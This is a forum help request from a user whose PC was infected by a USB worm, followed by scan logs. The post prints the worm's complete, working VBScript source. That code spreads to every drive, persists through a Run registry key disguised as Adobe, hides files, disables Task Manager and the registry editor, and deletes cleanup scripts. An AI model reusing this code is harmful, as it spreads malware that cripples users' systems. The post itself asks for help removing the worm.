Need,help a vbs.file is causing BIG problem

Question

hackimist 0 Newbie Poster

14 Years Ago

My Problem starts when i borrowed my classmates USB flash drive i click a 'katrinascandal.vbs". . .

Then not knowing anything i didn't think my drive was going to be infected with it

Then i start opening "My Computer" then C: and i found out i have "Katrinascandal.vbs"
So i tried to delete it but when i click refresh it came back then i tried to delete it
again then empty recycle bin but it come back always,then i check my G: drive and it has it
to,all my drive has it. . .

But then i am confident that there will be no complications until i tried to open
"task manager" Using Ctrl+Alt+Del but then one of the button is gone it's the
Start Task Manager i don't know what to do so i open some sites that might help me but many of the forums says fix it using regedit so i follow i open cmd then i type regedit
but it says "Regisrty editing has been disabled by your administrator"

So my problem has gotten bigger. . .

Until i tried to change the default opener of .vbs files i open "katrinascandal.vbs"
using notepad then i analyze it and i saw this:

On Error Resume Next
Dim fso, ax, win, wscr, kk, tf, scrText

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName


Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
   scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\AdobeCS4.vbs")

Set myFile = fso.CreateTextFile(win & "\AdobeCS4.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\AdobeCS4.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePhotoshopCS4", "wscript.exe """ & win & "\AdobeCS4.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\AdobeCS4.vbs"""

While (True)

    Set myDrives = fso.Drives
    For Each myFlashDrive In myDrives

        If myFlashDrive.Drivetype = 1 Or myFlashDrive.Drivetype = 2 And myFlashDrive.Path <> "A:" Then

            Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\KatrinaScandal.vbs", true)
            myFile.write scrText
            myFile.close

            Set myFile = fso.CreateTextFile(win & "\AdobeCS4.vbs", true)
            myFile.write scrText
            myFile.close

                Set fAttr = fso.Getfile(win & "\AdobeCS4.vbs")
                fAttr.Attributes=39

            Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\ReadMe.txt", true)
                myFile.write "[Check This out]" & vbCrLf & "" & vbCrLf & "you need a rest your tired"
                myFile.close

        End if
    Next
    With wscr
            .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePhotoshopCS4", "wscript.exe """ & win & "\AdobeCS4.vbs"""
            .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
            .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
            .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
            .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
            .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
            .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
            .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
    End With

If fso.FileExists(myFlashDrive.Path & "\solution.vbs") Then
    kk = fso.Deletefile(myFlashDrive.Path & "\solution.vbs")
End If

   If tf <> win & "\AdobeCS4.vbs" Then
      If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
   End If

   WScript.Sleep 10000

WEnd

Here's the MalwareBytes’ Anti-Malware log:

Malwarebytes' Anti-Malware 1.46
[url]www.malwarebytes.org[/url]

Database version: 4974

Windows 6.1.7600
Internet Explorer 8.0.7600.16385

10/18/2010 4:40:46 PM
mbam-log-2010-10-18 (16-40-46).txt

Scan type: Full scan (C:\|F:\|G:\|)
Objects scanned: 238281
Time elapsed: 43 minute(s), 40 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 4
Registry Values Infected: 1
Registry Data Items Infected: 2
Folders Infected: 2
Files Infected: 4

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
(No malicious items detected)

Registry Keys Infected:
HKEY_CLASSES_ROOT\CLSID\{147a976f-eee1-4377-8ea7-4716e4cdd239} (Adware.MyWebSearch) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a078f691-9c07-4af2-bf43-35e79eecf8b7} (Adware.Softomate) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{4d1ec4ca-4b92-4324-b8f8-c9a6ed06a8ae} (Adware.Hotbar) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{4e674574-3f0b-491d-8ae3-f90b43a34fd6} (Adware.Hotbar) -> Quarantined and deleted successfully.

Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions\hblite@hblite.com (Adware.HotBar) -> Quarantined and deleted successfully.

Registry Data Items Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools (Hijack.Regedit) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr (Hijack.TaskManager) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Folders Infected:
C:\Users\Se7en Ultimate\AppData\Roaming\HBLite (Adware.Hotbar) -> Quarantined and deleted successfully.
C:\ProgramData\HBLiteSA (Adware.Hotbar) -> Quarantined and deleted successfully.

Files Infected:
C:\Users\Se7en Ultimate\Desktop\Downloads\Completed\Bit Defender total security 2010\Bit Defender Total Security 2010 Best of Computers Cracked\Patch.exe (Malware.Tool) -> Quarantined and deleted successfully.
C:\Windows\Temp\TMP3F06.tmp (Trojan.Orsam) -> Quarantined and deleted successfully.
F:\Keygens\EA Games Generic Keygen 190.exe (Trojan.Orsam) -> Quarantined and deleted successfully.
C:\Windows\System32\secushr.dat (Malware.Trace) -> Quarantined and deleted successfully.

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Here's the GMER One.log

There's nothing in there?
Is that a problem?

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Here's the GMER Two.log 

GMER 1.0.15.15477 - [url]http://www.gmer.net[/url]
Rootkit scan 2010-10-18 15:53:55
Windows 6.1.7600 
Running: z2lr9hce.exe


---- Registry - GMER 1.0.15 ----

Reg  HKLM\SYSTEM\CurrentControlSet\services\sptd\Cfg@s1  771343423
Reg  HKLM\SYSTEM\CurrentControlSet\services\sptd\Cfg@s2  285507792

---- EOF - GMER 1.0.15 ----

Here's the DDS.txt

DDS (Ver_10-10-21.02) - NTFS_AMD64  
Run by Se7en Ultimate at 16:46:34.27 on Mon 10/18/2010
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_21
Microsoft Windows 7 Ultimate   6.1.7600.0.1252.1.1033.18.3839.2392 [GMT -7:00]

AV: avast! antivirus 4.8.1201 [VPS 100204-0] *On-access scanning enabled* (Updated)   {7591DB91-41F0-48A3-B128-1A293FD8233D}
SP: avast! antivirus 4.8.1201 [VPS 100204-0] *enabled* (Updated) {7591DB91-41F0-48A3-B128-1A293FD8233D}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Windows\System32\wscript.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Program Files\Windows Sidebar\sidebar.exe
F:\Programs\uTorrent.exe
C:\Program Files (x86)\RapidBIT\cisvc.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Program Files (x86)\Uniblue\PowerSuite\powersuite.exe
C:\Windows\SysWOW64\FL\SofonicaFolderSoldier.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k iissvcs
C:\Program Files (x86)\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Uniblue\SpeedUpMyPC\sump.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Program Files (x86)\Uniblue\RegistryBooster\registrybooster.exe
C:\Program Files (x86)\Uniblue\DriverScanner\driverscanner.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Users\Se7en Ultimate\Desktop\dds.scr
C:\Windows\system32\conhost.exe

============== Pseudo HJT Report ===============

uDefault_Search_URL = hxxp://www.google.com/ie
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
BHO: Octh Class: {000123b4-9b42-4900-b3f7-f4b073efc214} - F:\Programs\Orbitdownloader\orbitcth.dll
BHO: &Yahoo! Toolbar Helper: {02478d38-c3f9-4efb-9b51-7695eca05670} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll
BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: PC Tools Browser Guard BHO: {2a0f3d1b-0909-4ff4-b272-609cce6054e7} - C:\Program Files (x86)\Spyware Doctor\BDT\PCTBrowserDefender.dll
BHO: FlashGetBHO: {b070d3e3-fec0-47d9-8e8a-99d4eeb3d3b0} - C:\Users\Se7en Ultimate\AppData\Roaming\FlashGetBHO\FlashGetBHO3.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll
BHO: SingleInstance Class: {fdad4da1-61a2-4fd8-9c17-86f7ac245081} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\YTSingleInstance.dll
TB: Grab Pro: {c55bbcd6-41ad-48ad-9953-3609c48eacc7} - F:\Programs\Orbitdownloader\GrabPro.dll
TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll
TB: PC Tools Browser Guard: {472734ea-242a-422b-adf8-83d1e48cc825} - C:\Program Files (x86)\Spyware Doctor\BDT\PCTBrowserDefender.dll
TB: {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
uRun: [Messenger (Yahoo!)] "C:\PROGRA~2\Yahoo!\MESSEN~1\YahooMessenger.exe" -quiet
uRun: [LightScribe Control Panel] C:\Program Files (x86)\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [uTorrent] "F:\Programs\uTorrent.exe" /HIDE
uRun: [PowerSuite] "C:\Program Files (x86)\Uniblue\PowerSuite\launcher.exe" delay 20000  -m
mRun: [avast!] "C:\Program Files\Alwil Software\Avast4\ashDisp.exe"
mRun: [NBKeyScan] "F:\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
mRun: [SofonicaFolderSoldier] C:\Windows\SysWOW64\FL\SofonicaFolderSoldier.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [mspaint] "C:\Windows\system32\Paint.exe" -autocheck
uPolicies-system: DisableRegistryTools = 1 (0x1)
uPolicies-system: DisableTaskMgr = 1 (0x1)
mPolicies-explorer: NoActiveDesktop = 1 (0x1)
mPolicies-explorer: NoActiveDesktopChanges = 1 (0x1)
mPolicies-system: ConsentPromptBehaviorAdmin = 0 (0x0)
mPolicies-system: ConsentPromptBehaviorUser = 3 (0x3)
mPolicies-system: EnableLUA = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: &Download by Orbit - F:\Programs\Orbitdownloader\orbitmxt.dll/201
IE: &Grab video by Orbit - F:\Programs\Orbitdownloader\orbitmxt.dll/204
IE: Add to Google Photos Screensa&ver - C:\Windows\system32\GPhotos.scr/200
IE: Do&wnload selected by Orbit - F:\Programs\Orbitdownloader\orbitmxt.dll/203
IE: Down&load all by Orbit - F:\Programs\Orbitdownloader\orbitmxt.dll/202
IE: Download all by FlashGet3 - C:\Users\Se7en Ultimate\AppData\Roaming\FlashGetBHO\GetAllUrl.htm
IE: Download by FlashGet3 - C:\Users\Se7en Ultimate\AppData\Roaming\FlashGetBHO\GetUrl.htm
IE: Download with Xilisoft YouTube Video Converter
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~1\OFFICE11\EXCEL.EXE/3000
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - C:\PROGRA~2\MICROS~1\OFFICE11\REFIEBAR.DLL
LSP: C:\Program Files (x86)\Common Files\PC Tools\Lsp\PCTLsp.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "C:\Program Files (x86)\Common Files\LightScribe\LSRunOnce.exe"

================= FIREFOX ===================

FF - ProfilePath - C:\Users\SE7ENU~1\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\
FF - prefs.js: browser.search.defaulturl - hxxp://search.yahoo.com/search?fr=ffsp1&p=
FF - prefs.js: browser.search.selectedEngine - RomUlation ROM Search
FF - prefs.js: browser.startup.homepage - hxxp://www.google.com.ph/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT2653012&q=
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{b2e293ee-fd7e-4c71-a714-5f4750d8d7b7}\components\FFExternalAlert.dll
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{b2e293ee-fd7e-4c71-a714-5f4750d8d7b7}\components\RadioWMPCore.dll
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{cd90bf73-20f6-44ef-993d-bb920303bd2e}\components\FFExternalAlert.dll
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{cd90bf73-20f6-44ef-993d-bb920303bd2e}\components\RadioWMPCore.dll
FF - component: C:\Users\Se7en Ultimate\AppData\Roaming\Mozilla\Firefox\Profiles\d8ds703d.default\extensions\{DB9127A2-3381-41ec-82B3-1B6ED4C6F29A}\components\FlashGetXPI.dll
FF - component: F:\Programs\Orbitdownloader\addons\OneClickYouTubeDownloader\components\GrabXpcom.dll
FF - plugin: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
FF - plugin: C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Mozilla Firefox\plugins\npclntax_HBLiteSA.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll
FF - plugin: F:\Programs\Netscape6\nppl3260.dll
FF - plugin: F:\Programs\Netscape6\nprpjplug.dll
FF - plugin: F:\Programs\Plugins\npqtplugin.dll
FF - plugin: F:\Programs\Plugins\npqtplugin2.dll
FF - plugin: F:\Programs\Plugins\npqtplugin3.dll
FF - plugin: F:\Programs\Plugins\npqtplugin4.dll
FF - plugin: F:\Programs\Plugins\npqtplugin5.dll
FF - plugin: F:\Programs\Plugins\npqtplugin6.dll
FF - plugin: F:\Programs\Plugins\npqtplugin7.dll
FF - HiddenExtension: Java Console: No Registry Reference - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0018-ABCDEFFEDCBA}
FF - HiddenExtension: Java Console: No Registry Reference - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}

---- FIREFOX POLICIES ----
FF - user.js: yahoo.ytff.general.dontshowhpoffer - trueC:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbaam7a8h", true); 
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--fiqz9s", true); // Traditional
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--fiqs8s", true); // Simplified
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--j6w193g", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgberp4a5d4ar", true); 
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgberp4a5d4a87g", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbqly7c0a67fbc", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbqly7cvafr", true);
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--kpry57d", true);  // Traditional
C:\Program Files (x86)\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--kprw13d", true);  // Simplified

============= SERVICES / DRIVERS ===============

R0 PCTCore;PCTools KDS;C:\Windows\System32\drivers\PCTCore64.sys [2010-10-16 233488]
R1 aswSP;avast! Self Protection;C:\Windows\System32\drivers\aswSP.sys [2010-2-3 89680]
R2 aswFsBlk;aswFsBlk;C:\Windows\System32\drivers\aswFsBlk.sys [2010-2-3 22096]
R2 aswMonFlt;aswMonFlt;C:\Windows\System32\drivers\aswMonFlt.sys [2010-2-3 65616]
R2 avast! Antivirus;avast! Antivirus;C:\Program Files\Alwil Software\Avast4\ashServ.exe [2010-2-4 138680]
R2 FlexService;Remote Connections Service;C:\Program Files (x86)\RapidBIT\cisvc.exe [2009-5-17 41984]
R3 avast! Mail Scanner;avast! Mail Scanner;C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe [2010-2-4 254040]
R3 avast! Web Scanner;avast! Web Scanner;C:\Program Files\Alwil Software\Avast4\ashWebSv.exe [2010-2-4 352920]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]
S2 Uniblue DiskRescue;Uniblue DiskRescue; [x]
S3 npggsvc;nProtect GameGuard Service;C:\Windows\system32\GameMon.des -service --> C:\Windows\system32\GameMon.des -service [?]
S3 sdAuxService;PC Tools Auxiliary Service;C:\Program Files (x86)\Spyware Doctor\pctsAuxs.exe [2010-10-16 366840]
S3 sdCoreService;PC Tools Security Service;C:\Program Files (x86)\Spyware Doctor\pctsSvc.exe [2010-10-16 1142224]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2010-7-18 1255736]
S4 Browser Defender Update Service;Browser Defender Update Service;C:\Program Files (x86)\Spyware Doctor\BDT\BDTUpdateService.exe [2010-10-16 112592]

=============== Created Last 30 ================

2010-10-18 23:43:17 --------    d-----w-    C:\Users\SE7ENU~1\AppData\Local\Adobe
2010-10-18 19:12:58 2911    ----a-w-    C:\KatrinaScandal.vbs
2010-10-18 02:32:36 --------    d-----w-    C:\Users\SE7ENU~1\AppData\Roaming\Malwarebytes
2010-10-18 02:32:25 38224   ----a-w-    C:\Windows\SysWow64\drivers\mbamswissarmy.sys
2010-10-18 02:32:24 24664   ----a-w-    C:\Windows\System32\drivers\mbam.sys
2010-10-18 02:32:24 --------    d-----w-    C:\Program Files (x86)\Malwarebytes' Anti-Malware
2010-10-18 02:32:24 --------    d-----w-    C:\PROGRA~3\Malwarebytes
2010-10-18 01:54:55 388096  ----a-r-    C:\Users\SE7ENU~1\AppData\Roaming\Microsoft\Installer\{45A66726-69BC-466B-A7A4-12FCBA4883D7}\HiJackThis.exe
2010-10-18 01:54:55 --------    d-----w-    C:\Program Files (x86)\Trend Micro
2010-10-16 23:37:08 767952  ----a-w-    C:\Windows\BDTSupport.dll
2010-10-16 23:37:07 165840  ----a-w-    C:\Windows\PCTBDRes.dll
2010-10-16 23:37:07 1652688 ----a-w-    C:\Windows\PCTBDCore.dll
2010-10-16 23:37:07 149456  ----a-w-    C:\Windows\SGDetectionTool.dll
2010-10-16 23:22:53 306648  ----a-w-    C:\Windows\System32\drivers\pctgntdi64.sys
2010-10-16 23:22:53 133072  ----a-w-    C:\Windows\System32\drivers\pctwfpfilter64.sys
2010-10-16 23:22:49 233488  ----a-w-    C:\Windows\System32\drivers\PCTCore64.sys
2010-10-16 23:22:42 92896   ----a-w-    C:\Windows\System32\drivers\pctplsg64.sys
2010-10-16 23:22:26 --------    d-----w-    C:\Users\SE7ENU~1\AppData\Roaming\PC Tools
2010-10-16 23:22:26 --------    d-----w-    C:\Program Files (x86)\Spyware Doctor
2010-10-16 23:22:26 --------    d-----w-    C:\Program Files (x86)\Common Files\PC Tools
2010-10-16 15:35:56 641536  ----a-w-    C:\Windows\SysWow64\CPFilters.dll
2010-10-16 15:35:56 552960  ----a-w-    C:\Windows\System32\msdri.dll
2010-10-16 15:35:55 961024  ----a-w-    C:\Windows\System32\CPFilters.dll
2010-10-16 15:35:55 288256  ----a-w-    C:\Windows\System32\MSNP.ax
2010-10-16 15:35:55 258560  ----a-w-    C:\Windows\System32\mpg2splt.ax
2010-10-16 15:35:55 204288  ----a-w-    C:\Windows\SysWow64\MSNP.ax
2010-10-16 15:35:55 199680  ----a-w-    C:\Windows\SysWow64\mpg2splt.ax
2010-10-16 15:26:34 27008   ----a-w-    C:\Windows\System32\drivers\Diskdump.sys
2010-10-15 20:41:59 8006480 ----a-w-    C:\PROGRA~3\Microsoft\Windows Defender\Definition Updates\{266B8237-6E1E-43F2-880D-4517A69C119A}\mpengine.dll
2010-10-14 18:06:53 --------    d-sh--w-    C:\Windows\System32\%APPDATA%
2010-10-14 00:40:51 --------    d-----w-    C:\PROGRA~3\BitDefender
2010-10-14 00:40:47 291352  ----a-w-    C:\Windows\SysWow64\drivers\bdfsfltr.sys
2010-10-13 22:29:20 --------    d-----w-    C:\Users\SE7ENU~1\AppData\Local\Threat Expert
2010-10-13 21:21:20 --------    d-----w-    C:\PROGRA~3\PC Tools
2010-10-13 03:10:27 2911    --sha-r-    C:\Windows\AdobeCS4.vbs
2010-10-12 17:02:46 --------    d-----w-    C:\Windows\W7FBC
2010-10-09 16:25:44 --------    d-----w-    C:\Users\SE7ENU~1\AppData\Roaming\Godlike
2010-10-06 05:22:59 1638912 ----a-w-    C:\Windows\System32\mshtml.tlb
2010-10-06 05:13:40 167424  ----a-w-    C:\Program Files\Windows Media Player\wmplayer.exe
2010-10-06 05:13:40 164864  ----a-w-    C:\Program Files (x86)\Windows Media Player\wmplayer.exe
2010-10-06 05:13:39 12625408    ----a-w-    C:\Windows\SysWow64\wmploc.DLL
2010-10-06 05:13:38 12625920    ----a-w-    C:\Windows\System32\wmploc.DLL
2010-10-06 05:12:18 9728    ----a-w-    C:\Windows\SysWow64\sscore.dll
2010-10-06 05:12:18 463360  ----a-w-    C:\Windows\System32\drivers\srv.sys
2010-10-06 05:12:18 402944  ----a-w-    C:\Windows\System32\drivers\srv2.sys
2010-10-06 05:12:18 236032  ----a-w-    C:\Windows\System32\srvsvc.dll
2010-10-06 05:12:18 161792  ----a-w-    C:\Windows\System32\drivers\srvnet.sys
2010-10-06 04:51:14 954752  ----a-w-    C:\Windows\SysWow64\mfc40.dll
2010-10-06 04:51:14 954288  ----a-w-    C:\Windows\SysWow64\mfc40u.dll
2010-10-06 04:28:27 3123712 ----a-w-    C:\Windows\System32\win32k.sys
2010-10-06 04:17:51 148992  ----a-w-    C:\Windows\System32\t2embed.dll
2010-10-06 04:17:51 109056  ----a-w-    C:\Windows\SysWow64\t2embed.dll
2010-10-06 04:17:45 4582912 ----a-w-    C:\Program Files\Windows NT\Accessories\wordpad.exe
2010-10-06 04:17:45 2085376 ----a-w-    C:\Windows\System32\ole32.dll
2010-10-06 04:17:44 4247040 ----a-w-    C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
2010-10-06 04:17:44 1413632 ----a-w-    C:\Windows\SysWow64\ole32.dll
2010-10-06 04:14:52 483840  ----a-w-    C:\Windows\System32\StructuredQuery.dll
2010-10-06 04:14:52 363520  ----a-w-    C:\Windows\SysWow64\StructuredQuery.dll
2010-10-06 04:14:46 340992  ----a-w-    C:\Windows\System32\schannel.dll
2010-10-06 04:14:46 224256  ----a-w-    C:\Windows\SysWow64\schannel.dll
2010-10-06 04:14:37 633856  ----a-w-    C:\Windows\System32\comctl32.dll
2010-10-06 04:14:37 530432  ----a-w-    C:\Windows\SysWow64\comctl32.dll
2010-10-06 04:09:26 1024512 ----a-w-    C:\Windows\System32\wmpmde.dll
2010-10-06 04:09:25 738816  ----a-w-    C:\Windows\SysWow64\wmpmde.dll
2010-10-04 05:45:51 --------    d-----w-    C:\downloads
2010-09-28 23:38:25 --------    d-----w-    C:\Program Files (x86)\Combined Community Codec Pack
2010-09-28 22:45:15 1414440 ----a-w-    C:\Windows\SysWow64\ShellManager310E2D762.dll
2010-09-28 07:42:51 243712  ----a-w-    C:\Windows\System32\drivers\ks.sys
2010-09-28 03:47:29 2048    ----a-w-    C:\Windows\SysWow64\tzres.dll
2010-09-28 03:47:29 2048    ----a-w-    C:\Windows\System32\tzres.dll
2010-09-28 03:42:22 13312   ----a-w-    C:\Program Files\Internet Explorer\iecompat.dll
2010-09-28 03:42:22 13312   ----a-w-    C:\Program Files (x86)\Internet Explorer\iecompat.dll
2010-09-24 04:41:05 --------    d-----w-    C:\Users\SE7ENU~1\AppData\Local\Microsoft Games
2010-09-20 11:41:25 --------    d-----w-    C:\Users\SE7ENU~1\AppData\Local\MPlayer

==================== Find3M  ====================

2010-10-19 18:41:44 270720  ------w-    C:\Windows\System32\MpSigStub.exe
2010-09-18 09:48:53 56  --sh--r-    C:\Windows\SysWow64\CA10C53E1D.sys
2010-09-18 09:48:53 1890    --sha-w-    C:\Windows\SysWow64\KGyGaAvL.sys
2010-09-17 15:22:11 423656  ----a-w-    C:\Windows\SysWow64\deployJava1.dll
2010-09-14 08:00:00 108032  ----a-w-    C:\Windows\SysWow64\ff_vfw.dll
2010-09-10 05:35:44 135168  ----a-w-    C:\Windows\apppatch\AppPatch64\AcXtrnal.dll
2010-09-10 05:35:43 347648  ----a-w-    C:\Windows\apppatch\AppPatch64\AcLayers.dll
2010-09-09 23:16:04 1314816 ----a-w-    C:\Windows\is-7CKEP.exe
